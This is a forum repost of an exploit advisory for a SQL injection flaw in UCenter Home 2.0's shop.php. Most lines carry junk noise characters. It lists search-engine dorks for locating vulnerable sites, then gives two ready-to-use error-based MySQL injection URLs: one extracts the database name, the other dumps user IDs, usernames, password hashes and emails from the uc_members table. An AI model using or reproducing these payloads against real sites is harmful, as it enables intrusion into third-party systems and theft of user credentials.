V: i3 n. a* I% N2 K! M2 f1 H6 u
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ ' d; \6 D, A% ^7 E
9 y: x5 x/ C9 t
8 f/ D) i( L5 B( a, M
' q* g2 N; D- }0 o*/ Author : KnocKout
2 Q4 U' i% \3 L% O' ^. g9 J! {7 Y3 `/ |9 X- _3 m( y6 Z) |4 K
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
k, U! D. @. V
: v) W2 p9 f* I9 S: L*/ Contact: knockoutr@msn.com 2 i4 L! {( g4 U/ M5 L( k" N2 |
* H* [' a( \! X
*/ Cyber-Warrior.org/CWKnocKout
: E* ?$ A) ]$ {* }! H9 Y
* \) I T4 o5 z) R; v__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; D3 L, [1 I/ i7 b' m: _) e
" S0 @' r- A" |4 p7 ^, K) @Script : UCenter Home P; m/ ~2 h( h: K
6 p, F. E& x# t% B5 @* r) [( G, ^
Version : 2.0
& c& x0 E) B1 j# I/ X: Y7 {0 k: D& @* V, t0 U7 _/ d* B5 Z" ^. R
Script HomePage : http://u.discuz.net/ 3 l, X5 Q2 y' k# F' r" W0 u
4 ]' W6 K1 Y; k4 c" G9 u3 R
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , A% a5 Y* i1 e6 x# x: P) d* R) Q! X
6 G% i+ ]! P& }% }Dork : Powered by UCenter inurl:shop.php?ac=view
2 g9 d" M; B& ` J2 e7 N1 H" k
' k: l/ h7 V: o; u6 q- j2 N; {Dork 2 : inurl:shop.php?ac=view&shopid=
6 i# @) a4 B/ [$ e+ F* c* Z# s* d# a0 C |
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& n& K8 a' l# I. X
6 S9 x m; M, l4 s, pVuln file : Shop.php 5 n5 d7 G- F+ S a
- e. X* q& Q M1 kvalue's : (?)ac=view&shopid= # P1 q3 V9 J0 H" U
7 d4 @) Y; j! c/ R
Vulnerable Style : SQL Injection (MySQL Error Based)
; K' @ N6 [; s5 ^9 j8 x, V6 ^7 B4 _( U3 g) _3 G
Need Metarials : Hex Conversion
q; Z R6 f4 H) d# ]( h9 J* V+ d, j+ v" [, E
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 3 M$ \: Z9 o# s- f5 Z6 {- M; \* D2 X
' I% y2 W6 Y4 w; i6 O& h% R+ v# L
Your Need victim Database name. % r/ v3 A8 E5 c3 i
5 {9 u+ p1 I" R0 Ofor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
0 \( m) D9 n" F5 n( Z4 L* C! y3 S) m9 S7 v P
.. 1 k( R* Y2 `! |+ v2 R
$ { Q9 {* m/ e
DB : Okey.
, u3 X! ^. y% o% s# L7 F
: h$ ]8 _7 Z: x3 X+ kyour edit DB `[TARGET DB NAME]` 7 g4 x8 V8 r9 G& K+ W1 }2 h: Z
7 [, m3 X& [- |6 e4 u) n4 x' Y. l
Example : 'hiwir1_ucenter'
( I" V, S2 `0 D2 l; @
: I4 x% c8 C# ^- N7 G) lEdit : Okey.
, n* c9 |8 M8 y3 N, M' F0 p$ U% t% x* T4 @* E) ~- d7 s
Your use Hex conversion. And edit Your SQL Injection Exploit.. % j4 \# G- @) M
~% G* ]+ L" _/ X' a
; g9 K6 v4 O) J" _8 e
3 w0 r$ J Q3 X1 S! g+ O0 ?/ oExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
: V8 a7 u3 N4 m1 B8 G9 O |
发表于 2013-2-27 21:31:31
收藏
支持
反对